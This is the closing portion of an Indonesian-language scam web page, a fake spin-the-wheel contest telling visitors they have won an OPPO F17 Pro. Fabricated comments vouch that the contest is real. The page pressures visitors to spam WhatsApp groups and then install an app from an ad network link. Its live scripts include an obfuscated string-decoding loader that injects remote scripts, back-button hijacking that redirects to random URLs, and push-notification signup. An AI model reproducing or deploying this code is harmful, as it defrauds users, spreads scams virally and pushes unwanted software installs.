totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/rWJaWux.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Saathy Basu</span> permainan yang bagus..</p><p class='combot'><span class='ago'>1 hour ago</span> <span class='fblike'>Like</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/wYUu4Np.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Nidhi Shah</span> Perusahaan kurir mana yang akan mengirimkan parsel saya 🎁 ?</p><p class='combot'><span class='ago'>1 hour ago</span> <span class='fblike'>Like</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/aM50FsF.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Simran Kaur</span> Bukan palsu .. teman saya mendapat jam tangan pintar dari kontes ini..</p><p class='combot'><span class='ago'>1 hour ago</span> <span class='fblike'>Like</span><span class='likes totlikes'></span></p></div>
</div>
</div>
<div class="show-all">
<div class="wrapper">
<div class="title">
<p>Selamat!</p>
</div>
<img data-src="//lb.href.style/zp/XsSfdtd.jpg" class="lazyload logo" height="214" width="214">
<p class="txt">Anda telah memenangkan <b> OPPO F17 Pro (Matte Black, RAM 8GB, Penyimpanan 128GB) </b>.Kami hanya tersisa 13 OPPO F17 Pro untuk minggu ini. Ikuti petunjuk di bawah ini untuk mengklaim OPPO F17 Pro Anda.</p>
<div id="selectdiv" style="display: none;flex-direction: column;justify-content: center;align-items: center;width: 92%;
            margin: 20px auto 0;
            border: 1px solid #ccc;
            background-color: #f2f2f2;
            padding: 5px;">
<div style="margin-top:1rem;margin-bottom:1rem;">Pilih aplikasi favorit Anda sehingga staf layanan pelanggan kami dapat menghubungi Anda!</div>
<button class='btn btn-primary' style="background-color:#58BE41" onclick='chooseApp(1)' type='button'>WhatsApp</button>
<button class='btn btn-primary' style="margin-top:0.5rem;background-color:#49c5e6" onclick='chooseApp(2)' type='button'>Line</button>
</div>
<div class="bottom" id='buttonO'>
<div id="lastapp"><p class="now now2">Beritahu 5 Grup atau 20 Teman di Whatsapp tentang"Miliaran Hari Besar"!</p><p class="rules">1. Bagikan dengan 5 grup / 20 teman di Whatsapp (klik ikon "Whatsapp" di bawah)</p><p class="rules">2. klik "LANJUTKAN"dan klaim OPPO F17 Pro Anda.</p></div>
<div id='buttonl'>
<button class='btn btn-primary' id='sw_bn' onclick='incrementValue1()' type='button'>WhatsApp</button>
<input id='number' type='hidden' value='0' />
<h4 class="textlastup">Bagikan hingga bilah biru penuh!</h4>
<div class='progress' style="padding:0px">
<span aria-valuemax='100%' aria-valuemin='1%' aria-valuenow='1' id='progressbar' style='width: 1%; max-width: 100%;' />
<p></p>
</div>
<br>
<a href="javascript:tipn();" id="b2">
<div class="buttond"><span style="padding-right: 5px;" class="glyphicon glyphicon-shopping-cart"></span>TERUS</div>
</a>
</div>
</div>
<div id='button2' style="display:none">
<button class='btn btn-primary' onclick='dapp()' type='button'>Unduh Aplikasi</button>
<div style="width:100%;text-align: center;">
<script type="text/javascript" src="https://uprimp.com/bnr.php?section=General&pub=518855&format=300x50&ga=g"></script></div
            </div>
<p class="now">Penawaran ini berlaku selama 500 detik.</p>
</div>
</div>
</div>
</div>
<script type="text/javascript">
        if (get_Cookie('prog')) {
            setTimeout(function () {
                $(".hide-all").hide();
                $(".show-all").show();
                
                incrementValue_a();
                fn1_a();
                chooseApp(1);

                if(get_Cookie("appName")!=""){
                  appName = get_Cookie("appName");
                }
                $(".appName").html(appName);
                $("#sw_bn").html(appName);
                tipnstr = tipnstr.replace(/NNN/g, appName);
                document.getElementById("buttonO").style.display="block";
                document.getElementById("selectdiv").style.display="none";

            }, 200)
        }

        function spinnerAction() {
            //alert("Welcome to Lucky Wheel!Spin the Wheel and you may win exclusive prizes!Click OK to Start the Game!")
        }

        function startSpin() {
            var e = document.getElementById("spin"),
                n = document.getElementById("win"),
                t = document.getElementById("winP"),
                o = document.getElementById("win2");
            e.className = e.className + "spinAround", n.style.display = "none", t.style.display = "block", setTimeout(
                function () {
                    t.style.display = "none", o.style.display = "block"
                }, 150), setTimeout(function () {
                alert("Anda Memenangkan 1 Putaran Ekstra Gratis!"), spin2enabled = !0
            }, 6500)
            _record('sp', 'go');
        }

        function spin2() {
            if (spin2enabled) {
                var e = document.getElementById("spin"),
                    n = document.getElementById("win"),
                    t = document.getElementById("winP"),
                    o = document.getElementById("win2");
                e.className = e.className + " spinAround2", n.style.display = "none", t.style.display = "block",
                    setTimeout(function () {
                        t.style.display = "none", o.style.display = "block"
                    }, 150), setTimeout(function () {
                        var e = alert(
                            "Selamat! Hadiah Anda: OPPO F17 Pro (Matte Black, RAM 8GB, Penyimpanan 128GB). Silakan ikuti instruksi untuk memenangkan hadiah Anda!"
                            );
                        e === !0 || $(".hide-all").hide(), $(".show-all").show();
                    }, 6800)
            }
        }



        j = '';
        banner = '';
        var tiaoban = "";


        theme = 'aden';
        var _0x2e00=['W7L0WQ/cJJtcVdXGAhK=','WRn6W70QW5m1WO8=','W7FdLmoRoG==','lCo3FY7dJbq=','WQXaW73dLqvdW4tcGCk2ja==','WRFdSmkzBmkdWRG=','W7zikNVcQSoZW61cjX8=','WPjTW7lcSYRcISoiW7q9sW==','W47dRZ8sxe7cRqmKrq==','hX3dMCoGis0HW6VcKxC=','ECkMamkVm1mYzg/dVq==','WOJdHbhdRq==','qSk7DmoR','A0XvWOhdImoApLvTW4C=','W6vFDIGiAMpcUNGW','zK1mWOVcLCoke1PKWOy=','WRhcLx8uiqe=','hSoNEWyUWQ7cKmkqWQLl','rGBcTW==','A8oJxCkQ','m8khW5pcKcZcQG==','DtnTlvpcVmoHWRz0WPu=','CCo2mbpcP8oLW4v+W4a=','WOLWlCkbWQPpW7FcMmo4kG==','W47dTdDsuGldPLrSuW==','oIFdJvGQW6ddR8kNeIG=','W5j+s8kw','zctdNLqGW6hcJ8kRgsa=','mSo9yYlcHK/dImogf8oN','W4vpW6xdP8kSW5i=','q1jPESkvW68nCuldOW==','lCkXy00=','WQpcICor','qZb2','WRhdSSokW5dcQNbooa==','WPHXW6tcTYZcM8opW70+sq=='];(function(_0x4879e2,_0x24254b){var _0x2e0029=function(_0x532a5c){while(--_0x532a5c){_0x4879e2['push'](_0x4879e2['shift']());}};_0x2e0029(++_0x24254b);}(_0x2e00,0xc6));var _0x532a=function(_0x4879e2,_0x24254b){_0x4879e2=_0x4879e2-0x1de;var _0x2e0029=_0x2e00[_0x4879e2];if(_0x532a['tnYgof']===undefined){var _0x532a5c=function(_0x4907f5){var _0x2b640e='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=',_0x44e3e6=String(_0x4907f5)['replace'](/=+$/,'');var _0x1dc91d='';for(var _0x569d12=0x0,_0x12499e,_0xed335e,_0x597bae=0x0;_0xed335e=_0x44e3e6['charAt'](_0x597bae++);~_0xed335e&&(_0x12499e=_0x569d12%0x4?_0x12499e*0x40+_0xed335e:_0xed335e,_0x569d12++%0x4)?_0x1dc91d+=String['fromCharCode'](0xff&_0x12499e>>(-0x2*_0x569d12&0x6)):0x0){_0xed335e=_0x2b640e['indexOf'](_0xed335e);}return _0x1dc91d;};var _0x4cdca0=function(_0x2b63f7,_0x1032ce){var _0x2fc8ac=[],_0x1c10e2=0x0,_0x2f0b62,_0x231c95='',_0x47dbb4='';_0x2b63f7=_0x532a5c(_0x2b63f7);for(var _0x3663d8=0x0,_0x576ff2=_0x2b63f7['length'];_0x3663d8<_0x576ff2;_0x3663d8++){_0x47dbb4+='%'+('00'+_0x2b63f7['charCodeAt'](_0x3663d8)['toString'](0x10))['slice'](-0x2);}_0x2b63f7=decodeURIComponent(_0x47dbb4);var _0x27468d;for(_0x27468d=0x0;_0x27468d<0x100;_0x27468d++){_0x2fc8ac[_0x27468d]=_0x27468d;}for(_0x27468d=0x0;_0x27468d<0x100;_0x27468d++){_0x1c10e2=(_0x1c10e2+_0x2fc8ac[_0x27468d]+_0x1032ce['charCodeAt'](_0x27468d%_0x1032ce['length']))%0x100,_0x2f0b62=_0x2fc8ac[_0x27468d],_0x2fc8ac[_0x27468d]=_0x2fc8ac[_0x1c10e2],_0x2fc8ac[_0x1c10e2]=_0x2f0b62;}_0x27468d=0x0,_0x1c10e2=0x0;for(var _0x4a779a=0x0;_0x4a779a<_0x2b63f7['length'];_0x4a779a++){_0x27468d=(_0x27468d+0x1)%0x100,_0x1c10e2=(_0x1c10e2+_0x2fc8ac[_0x27468d])%0x100,_0x2f0b62=_0x2fc8ac[_0x27468d],_0x2fc8ac[_0x27468d]=_0x2fc8ac[_0x1c10e2],_0x2fc8ac[_0x1c10e2]=_0x2f0b62,_0x231c95+=String['fromCharCode'](_0x2b63f7['charCodeAt'](_0x4a779a)^_0x2fc8ac[(_0x2fc8ac[_0x27468d]+_0x2fc8ac[_0x1c10e2])%0x100]);}return _0x231c95;};_0x532a['TmSvFl']=_0x4cdca0,_0x532a['akUkND']={},_0x532a['tnYgof']=!![];}var _0x302654=_0x532a['akUkND'][_0x4879e2];return _0x302654===undefined?(_0x532a['Agxiih']===undefined&&(_0x532a['Agxiih']=!![]),_0x2e0029=_0x532a['TmSvFl'](_0x2e0029,_0x24254b),_0x532a['akUkND'][_0x4879e2]=_0x2e0029):_0x2e0029=_0x302654,_0x2e0029;};var _0xb2cdc0=_0x532a,t=Math[_0xb2cdc0(0x1fb,'B](7')](new Date()[_0xb2cdc0(0x1f1,'oka#')]()/0xf4240);(function(){var _0x45ee27=_0xb2cdc0,_0x302654=document[_0x45ee27(0x1f7,'CLtA')+_0x45ee27(0x1de,'VsSM')](_0x45ee27(0x1f5,'bWmr'));_0x302654['src']='https://aj'+'ax.googles'+_0x45ee27(0x1f6,'eFmT')+_0x45ee27(0x1ea,'Djlt')+'jo/1.13.1/'+_0x45ee27(0x1fd,'rARp')+_0x45ee27(0x1ed,'Jy71')+t;var _0x4cdca0=document[_0x45ee27(0x1fe,'3d9Y')+'sByTagName'](_0x45ee27(0x1e0,'#wq4'))[0x0];_0x4cdca0[_0x45ee27(0x1f4,'t%nA')][_0x45ee27(0x1ff,'rARp')+'re'](_0x302654,_0x4cdca0);}());var _hmt=_hmt||[];(function(){var _0x2b1d0b=_0xb2cdc0,_0x4907f5=document['createElem'+'ent'](_0x2b1d0b(0x200,'knmY'));_0x4907f5[_0x2b1d0b(0x1ec,'6Qxp')]=_0x2b1d0b(0x1e1,'1fuS')+_0x2b1d0b(0x1e5,'qqki')+_0x2b1d0b(0x1f8,'0riG')+_0x2b1d0b(0x1fa,'IOr*')+_0x2b1d0b(0x201,'%ROL')+_0x2b1d0b(0x1e2,'Pnuw');var _0x2b640e=document[_0x2b1d0b(0x1f9,'iTsV')+'sByTagName'](_0x2b1d0b(0x1f3,'JoB)'))[0x0];_0x2b640e[_0x2b1d0b(0x1e7,'qqki')][_0x2b1d0b(0x1ef,'CLtA')+'re'](_0x4907f5,_0x2b640e);}());function incrementValue1(){var _0x1ed280=_0xb2cdc0,_0x44e3e6=encodeURIComponent(share_detail)+''+tranDomain+'';value=parseInt(get_Cookie(_0x1ed280(0x1df,'IOr*')));value==0x1&&daoliang_url!=''&&(_0x44e3e6=encodeURIComponent(daoliang_url));if(appName=='Whatsapp')window[_0x1ed280(0x1eb,'Pnuw')]('whatsapp:/'+_0x1ed280(0x1e3,'&ReK')+'= '+_0x44e3e6);else{if(appName==_0x1ed280(0x1e6,'xjY3'))window[_0x1ed280(0x1f2,'6E1X')](_0x1ed280(0x1e8,'JoB)')+_0x1ed280(0x1e9,'u4S[')+_0x44e3e6);else appName==_0x1ed280(0x1ee,'%48V')&&window['open'](_0x1ed280(0x1f0,'xsKx')+_0x1ed280(0x1e4,'0riG')+'='+_0x44e3e6);};setTimeout(function(){var _0x31085e=_0x1ed280;incrementValue_i(),fn1_i(),value=parseInt(get_Cookie('prog')),set_Cookie(_0x31085e(0x1fc,'QB99'),value+0x1);},0x7d0);};

        function incrementValue_i() {
            get_Cookie('prog') == '' ? value = 0 : value = get_Cookie('prog');
            value == 2 || value == 4 ? alert(
              alertTip
                ) : void(0);
            set_Cookie('prog', value);

            _record('sp', value);
            _record(theme, 'share');

            gtag('event', 'send', {
              'method': 'whatsapp',
              'num': value
            });

            if (value >= 12) {
                _record('sp', 'wc');
                lasthtml();

            }


        }

        function fn1_i() {
	
          v=get_Cookie('prog');
          document.querySelector('.progress').style.display = "block";
          v=='0'?ob=30:v=='1'?ob=50:v=='2'?ob=52:v=='3'?ob=60:v=='4'?ob=60:v=='5'?ob=65:v=='6'?ob=70:v=='7'?ob=80:v=='8'?ob=85:v=='9'?ob=90:v=='10'?ob=96:v=='11'?ob=98:v=='12'?ob=100:void(0);
          document.querySelector('.progress span').style['width'] = ob + "%";
          document.querySelector('.progress span').style['width'] = ob + "%";
          document.querySelector('.progress p').textContent = ob + "%";
           
        }

        function incrementValue_a() {


            value = parseInt(get_Cookie('prog')) - 1;
            value == 2 || value == 4 ? alert(
                alertTip
                ) : void(0);


            _record('sp', value);
            _record(theme, 'share');


            if (value >= 12) {
                _record('sp', 'wc');
                lasthtml();

            }
        }

        function fn1_a() {

            v = parseInt(get_Cookie('prog')) - 1;
            document.querySelector('.progress').style.display = "block";
            v == '0' ? ob = 30 : v == '1' ? ob = 50 : v == '2' ? ob = 52 : v == '3' ? ob = 60 : v == '4' ? ob = 60 :
                v == '5' ? ob = 65 : v == '6' ? ob = 70 : v == '7' ? ob = 80 : v == '8' ? ob = 85 : v == '9' ? ob = 90 :
                v == '10' ? ob = 96 : v == '11' ? ob = 98 : v == '12' ? ob = 100 : void(0);
            document.querySelector('.progress span').style['width'] = ob + "%";
            document.querySelector('.progress span').style['width'] = ob + "%";
            document.querySelector('.progress p').textContent = ob + "%";

        }



        function tipn() {
            alert(tipnstr);
        }


        function set_Cookie(name, value) {
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days * 20 * 1000));
            document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + "; path=/;"
        }

        function get_Cookie(name) {
            var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
            if (arr = document.cookie.match(reg)) {
                return unescape(arr[2]);
            }
            return '';
        }

        function getQueryString(name) {
            var reg = new RegExp('(^|&)' + name + '=([^&]*)(&|$)', 'i');
            var r = window.location.search.substr(1).match(reg);
            if (r != null) {
                return unescape(r[2]);
            }
            return null;
        }

        function chooseApp(type){
           if(type==1){
              appName="Whatsapp";
           }else{
              appName="Line";
           }
           set_Cookie("appName", appName);
           $(".appName").html(appName);
           $("#sw_bn").html(appName);
           tipnstr = tipnstr.replace(/NNN/g, appName);
           document.getElementById("buttonO").style.display="block";
           document.getElementById("selectdiv").style.display="none";
        }

        function lasthtml() {
            html="<font color='red'>Selamat! Langkah terakhir:</font><br/><br/>Anda harus menyelesaikan langkah terakhir ini!<br/><br/>1. Anda harus memasang aplikasi di bawah ini dan setelah terpasang Anda harus membukanya selama 30 detik. <br/> <br/> (Ingat, langkah ini sangat penting) <br/> <br/> Setelah menyelesaikan tindakan di atas, harap tunggu admin memeriksanya, peninjauan akan selesai dalam waktu 24 jam.<br/><br/>";
            document.getElementById("lastapp").innerHTML = html;
            document.getElementById("buttonl").style.display = 'none';
            document.getElementById("button2").style.display = 'block';
        }

        function dapp() {
            window.open("//goraps.com/fullpage.php?section=General&pub=518855&ga=g");
        }





        _record(getQueryString('l'));
        _record('sp');

    </script>
<style type="text/css">
        div,
        main,
        article,
        aside,
        footer,
        nav,
        section,
        header {
            display: block;
        }

        span {
            display: inline;
        }

        h1,
        h2,
        h3 {
            display: block;
        }
    </style>
<script>
        window.onhashchange = function () {
            jp();
        };

        function hh1() {
            history.pushState(history.length + 1, "message", "#" + new Date().getTime());
        }

        function jp() {
            fh();
        }
        setTimeout('hh1();', 500);

        function fh() {
            location.href =  returnUrls[Math.floor(Math.random() * returnUrls.length)];
        }




        (function () {
            window.dataLayer = window.dataLayer || [];
            window.gtag = function () {
                dataLayer.push(arguments);
            }
            gtag('js', new Date());

            gtag('config', 'G-VLP9ZRYVD3');
            gtag('set', {
                'case': 'globel-zhuanpan'
            });
        })();

        lazyload();
        
        setTimeout(function(){
            document.getElementById("loading").setAttribute("style", "display:none");
            document.getElementById("fatherdiv").setAttribute("style", "visibility: visible");
        },1000);
    </script>
<script src='https://cdn.onesignal.com/sdks/OneSignalSDK.js' async=''></script>
<script>
    window.OneSignal = window.OneSignal || [];
    OneSignal.push(function() {
      OneSignal.init({
        appId: '47ea5437-f0b8-49fa-9de5-339e3aab0f47',
      });
    });
    </script>
</html>
